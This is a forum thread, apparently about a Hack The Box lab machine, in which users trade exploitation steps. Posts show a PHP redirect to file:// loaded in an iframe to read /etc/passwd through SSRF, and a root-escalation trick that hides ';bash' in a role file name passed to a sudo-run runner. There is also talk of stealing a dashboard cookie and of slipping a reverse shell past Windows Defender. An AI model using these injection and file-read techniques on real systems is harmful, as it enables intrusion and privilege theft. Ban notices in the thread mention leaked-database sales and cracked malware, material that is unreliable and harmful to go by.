[adolfo]

sudo ssh-keygen -p -P 'Y27SH19HDIWD" -N "" -m pem -f ./private.txt     --> whitout password...

[archnet]

Hi any way to get through ssrf?

$ cat lfi.php
<?php header('location:file://'.$_REQUEST['x']); ?>

$ cat index.html

<!DOCTYPE html>
<html lang=en>
<body>
<iframe src="http://10.10.14.3/lfi.php?x=/etc/passwd" height=1000px width=1000px></iframe>
</body>
</html>

i get a Frame load interrupted by policy change, tried adding spaces and other things said by CVE-2023-24329 but i can't seem to read any file

[br2023]

Hi any way to get through ssrf?

$ cat lfi.php
<?php header('location:file://'.$_REQUEST['x']); ?>

$ cat index.html

<!DOCTYPE html>
<html lang=en>
<body>
    <iframe src="http://10.10.14.3/lfi.php?x=/etc/passwd" height=1000px width=1000px></iframe>
</body>
</html>

i get a Frame load interrupted by policy change, tried adding spaces and other things said by CVE-2023-24329 but i can't seem to read any file

"Frame load interrupted by policy change " issue - try using php http server instead of python

LFI - don't use the lfi from pdfy htb challenge albeit the concept is related,  lfi script is not. someone in the previous thread has mentioned the right lfi for the intuition challenge.

[paro]

For those who are having difficulties, this is how I managed

I downloaded the link shared here in previous posts

1) python3 -m http.server

2) curl -O http://10.10.x.x:8000/sys-admins-role-0.0.3.tar.gz

3) mv sys-admins-role-0.0.3.tar.gz sys-admins-role.tar

4) sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
- sys-admins-role.tar is already installed, skipping.

.json file =
{
  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar"
        },
  "auth_code":"UHI75GHINKOP"
Now I'm stuck and I don't know where to go if anyone can help I'd be grateful

rename tar to sys-admins-role.tar;bash
.json file =
{
  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar;bash"
        },
  "auth_code":"UHI75GHINKOP"

sudo /opt/runner2/runner2 file.json

You should be able to get root shell

I keep getting "Error parsing JSON data".
I downloaded the .tar and renamed it to 'sys-admins-role.tar;bash'
I created a .json with
{
  "run": {
    "action": "install",
    "role_file": "sys-admins-role.tar;bash",
  },
  "auth_code": "UHI75GHINKOP"
}

Wtf am I doing wrong? What am I missing?

[macavitysworld]

For those who are having difficulties, this is how I managed

I downloaded the link shared here in previous posts

1) python3 -m http.server

2) curl -O http://10.10.x.x:8000/sys-admins-role-0.0.3.tar.gz

3) mv sys-admins-role-0.0.3.tar.gz sys-admins-role.tar

4) sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
- sys-admins-role.tar is already installed, skipping.

.json file =
{
  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar"
        },
  "auth_code":"UHI75GHINKOP"
Now I'm stuck and I don't know where to go if anyone can help I'd be grateful

rename tar to sys-admins-role.tar;bash
.json file =
{
  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar;bash"
        },
  "auth_code":"UHI75GHINKOP"

sudo /opt/runner2/runner2 file.json

You should be able to get root shell

I keep getting "Error parsing JSON data".
I downloaded the .tar and renamed it to 'sys-admins-role.tar;bash'
I created a .json with
{
  "run": {
    "action": "install",
    "role_file": "sys-admins-role.tar;bash",
  },
  "auth_code": "UHI75GHINKOP"
}

Wtf am I doing wrong? What am I missing?

Dm me on tg/discord @macavitysworld

[osamy7593]

Guys i have a question can we bypass windows 11 firewall and real time protection to get a reverse shell ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Hercobolus]

I am at the same point. Can someone please explain how to exchange that cookie? I used a cookie editor plugin on firefox. I set it for dashboard.comprezzor.htb right? But I also end up at the login page. Maybe someone can help here or PM me.
I am at the first cookie I have via "fetch" and http.server

[obasoba3]

interesting indeed

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling public data /Thread-SELLING-WDC-Q4-Chinese-Immigration-database /Thread-Facebook-Database-Leaked-Download /Thread-SELLING-Indonesian-Ministry-of-Transportation-Full-Employees-Database

[HTBcracker]

writeup:

Hidden Content

You must register or login to view this content.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Malware. /Thread-Shellter-Pro-v4-7-x86-NOT-WORKING-crack

[iiNovaCore]

For those who are having difficulties, this is how I managed

I downloaded the link shared here in previous posts

1) python3 -m http.server

2) curl -O http://10.10.x.x:8000/sys-admins-role-0.0.3.tar.gz

3) mv sys-admins-role-0.0.3.tar.gz sys-admins-role.tar

4) sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
- sys-admins-role.tar is already installed, skipping.

.json file =
{
  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar"
        },
  "auth_code":"UHI75GHINKOP"
Now I'm stuck and I don't know where to go if anyone can help I'd be grateful

rename tar to sys-admins-role.tar;bash
.json file =
{
  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar;bash"
        },
  "auth_code":"UHI75GHINKOP"

sudo /opt/runner2/runner2 file.json

You should be able to get root shell

im getting invalid tar archive errors while using that, but without the ;bash it runs correctly, why would that be?

heres the json im runnin with right now

  "run":{
        "action":"install",
        "role_file":"sys-admins-role.tar; bash"
        },
  "auth_code":"UHI75GHINKOP"
}